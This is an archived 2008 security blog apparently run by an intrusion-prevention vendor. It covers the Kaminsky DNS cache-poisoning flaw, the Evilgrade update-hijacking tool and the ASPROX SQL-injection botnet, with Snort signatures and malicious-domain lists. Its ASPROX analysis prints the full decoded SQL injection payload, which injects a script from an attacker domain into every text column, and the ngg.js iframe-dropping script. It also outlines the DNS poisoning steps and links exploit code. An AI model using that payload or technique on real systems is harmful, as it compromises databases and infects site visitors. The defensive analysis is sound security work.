Monday, July 28, 2008

You have a new update available...

On the tail of the huge DNS flaw, Argentinian group InfoByte Security Research have released a shocking new tool to exploit insecure application updates using man in the middle attack including Kaminsky's DNS poisoning.

Essentially "Evilgrade" is both an attack toolkit and mock update server framework to redirect application's update services to the host running Evilgrade. If successful full system compromise is capable giving the attacker a passive way to amass a botnet.

Evilgrade has support for exploiting the following popular program's update services:
Java, Winzip, Winamp, Mac OS X, OpenOffice, iTunes, Linkedin Toolbar

So what is the upside to such a scary tool? It will likely force developers to create new a new secure process for pushing updates, probably moving to some sort of PKI architecture.

Thursday, July 24, 2008

Kaminsky DNS Cache Poisoning PoC Exploit in Metasploit SVN

Looks like Druid and HDM have release a proof of concept exploit in Metasploit to attack nameserver's using Kaminsky's now leaked vulnerability. This is huge because not only is the attack unbelievably easy execute, 95% of the Internet is still vulnerable!

This is a historical moment in IT Security and will be a very, very busy day for those of us on the defense side.

Exploit Code:

http://www.caughq.org/exploits/CAU-EX-2008-0002.txt

http://www.caughq.org/exploits/CAU-EX-2008-0003.txt

Or simply grab the latest metasploit:

svn co http://metasploit.com/svn/framework3/trunk/

Snort signatures I wrote for Emerging Threats:

alert udp any 53 -> $HOME_NET any (msg:"ET CURRENT_EVENTS DNS Query Responses with 3 RR's set (50+ in 2 seconds) - possible NS RR Cache Poisoning Attempt"; content: "|85 00 00 01 00 01 00 01|"; offset: 2; within: 8; threshold: type both, track by_src,count 50, seconds 2; classtype:bad-unknown; reference:url,infosec20.blogspot.com/2008/07/kaminsky-dns-cache-poisoning-poc.html; sid:2008447; rev:10;)

alert udp any 53 -> $HOME_NET any (msg:"ET CURRENT_EVENTS DNS Query Responses with 3 RR's set (50+ in 2 seconds) - possible A RR Cache Poisoning Attempt"; content: "|81 80 00 01 00 01 00 01|"; offset: 2; within: 8; threshold: type both, track by_src, count 50, seconds 2; classtype:bad-unknown; reference:url,infosec20.blogspot.com/2008/07/kaminsky-dns-cache-poisoning-poc.html; sid:2008457; rev:10;)


*** Update ***
New metasploit module out this morning which allows you to overwrite cache poisoning the NS record for an entire domain. This means if you have evil NS server to take requests you mass own entire domains such as google, microsoft, etc. Scary stuff.

http://blog.wired.com/27bstroke6/2008/07/dns-exploit-in.html

Tuesday, July 22, 2008

Major DNS Flaw revealed

The Security blogosphere is exploding with chatter today about leaked details of Dan Kaminsky's multi-vendor DNS flaw.

Here is how it works (according to leak):

Malory wants to poison the server ns.polya.com

Malory sends NS requests for ulam00001.com, ulam00002.com … to ns.polya.com.

Malory then sends a forged answers, saying that the NS for http://www.ulam00002.com is ns.google.com *AND* puts a glue record saying that ns.google.com is 66.6.6.6

Because the glue records corresponds with the answer record, (same domain) the targetted nameserver will cache or replace it’s curent record of ns.google.com to be 66.6.6.6

http://addxorrol.blogspot.com/2008/07/on-dans-request-for-no-speculation.html

Make sure to read the comments for details of the original leak (Matasano's blog), the drama is Matasano originally called BS on the flaw forcing Dan to back it up with a phone briefing. Thomas Ptacek then re-tracked his BS claims under the agreement he would keep quiet. Now the same guy leaked the technical details is attempting to apologize... What a jerk.

http://www.matasano.com/log/1105/regarding-the-post-on-chargen-earlier-today/

Updated ASPROX Toolkit

We have a new tool kit available with the following important additions:

T-SQL code for cleaning infected databases.

URLScan configuration instructions for catching injection attempts.

click here to grab the new tool kit

Thursday, July 10, 2008

ASPROX Botnet up to 16,500 Zombies

Just a quick update, ASPROX is currently around 16,500 zombies up from 12k last week.

Get the updated IP list of the infected zombie hosts

And make sure to grab our ASPROX information toolkit

Monday, July 7, 2008

ASPROX Payload Morphed NGG.JS

New domains found and new javascript payload "ngg.js" replaced the previous "b.js".

And it doesn't seem to be wasting any time:
http://www.google.com/search?q=ngg.js
Results 1 - 10 of about 19,300 for ngg.js. (0.03 seconds)

New SQL Injection Payload (HEX DECODED):

DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''script src=http://www.apidad.com/ngg.js /script''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

Whats in ngg.js? Familiar iframe attack from before but this time selectively ignores browsers from Russia, Ukraine, China, Korea, Vietnam and India. Lovely :)

window.status="";
n=navigator.userLanguage.toUpperCase();
if((n!="ZH-CN")&&(n!="UR")&&(n!="RU")&&(n!="KO")&&(n!="ZH-TW")&&(n!="ZH")&&(n!="HI")&&(n!="TH")&&(n!="UR")&&(n!="VI")){
var cookieString = document.cookie;
var start = cookieString.indexOf("updngg=");
if (start != -1){}else{
var expires = new Date();
expires.setTime(expires.getTime()+11*3600*1000);
document.cookie = "updngg=update;expires="+expires.toGMTString();
try{
document.write("iframe src=http://mainbvd.com/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0>/iframe");
}
catch(e)
{
};
}}



New ASPROX domains spotted:
apidad.com, mainbvd.com, bnrbtch.com, ucomddv.com, brsadd.com, asodbr.com, canclvr.com, portwbr.com, catdbw.mobi, allocbn.mobi, testwvr.com, stiwdd.com, adwadb.mobi, dbgbron.com, ktrcom.com, hiwowpp.cn, clrbbd.com, browsad.com, blockkd.com, bnradd.mobi, bnrbase.com, adbtch.com, aladbnr.com, aladbnr.com, loctenv.com, bnrbasead.com, appdad.com, blcadw.com, destbnp.com, attadd.com, nopcls.com, ausbnr.com, bkpadd.mobi, tctcow.com, ausadd.com, movaddw.com, cliprts.com


Snort signature to detect access of infected site:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ASPROX Infected Site - ngg.js Request"; flow:established,to_server;
uricontent:"/ngg.js"; classtype:trojan-activity; reference:url,infosec20.blogspot.com/; rev:1; sid:4000002;)

And finally go here to download Sentinel IPS' ASPROX Information Toolkit

Thursday, July 3, 2008

ASPROX Botnet Fingerprinted: 11,816 Zombies

Today at 2pm CST I launched a massive query on our widespread network of Sentinel IPS appliances pulling unique source IP's from the ASPROX SQL Injection attacks.

Now we have an idea of size, location of zombies and a giant block list which we have made available right here

**Update** This is a list of infected machines emanating the SQL Injection attacks, not the number of compromised ASP websites, which is much higher nearing 100,000.

Was fun to whip up this geo-map of ASPROX's zombies...

Wednesday, July 2, 2008

New ASPROX / SQL Injection Defense Tools

ASPROX is not letting up, many of our clients are still seeing SQL Injection attacks blocked every 3-5 minutes on their Sentinel.

Microsoft released a tool for scanning your ASP and ASPX code and identifying SQL Injection vulnerabilities. I highly recommend giving it a try kb-954476

Also HP released a free version of their web security auditing tool specifically to check for SQL Injection, it's called Scrawler and you can get it here


More ASPROX domains (they don't give up, do they?):

tid62.com, kadport.com, suppadw.com, supbnr.com, adwsupp.com, bnrupdate.mobi, adwste.mobi, adupd.mobi, hlpgetw.com, hdadwcd.com, rid34.com, adupd.mobi, adwste.mobi, bnrupdate.mobi, cntrl62.com, config73.com, cont67.com, csl24.com, debug73.com, default37.com, get49.net, pid72.com, pid76.net, web923.com, base48.com, asp63.com, form43.com, maigol.cn


And finally we are still emailing our ASPROX Toolkit document which gives information on the attack and how to recover from it if you organization has been compromised.

Tuesday, July 1, 2008

Iframes and IE, vewwy vewwy bad...

Response poured in from my last post wanting to know how Malware can be loaded from simply including an iframe (sourcing html from another site).

Well in case you too are wondering, MS never intended it to be that way....

See http://www.kb.cert.org/vuls/id/516627


New ASPROX domains: dl251.com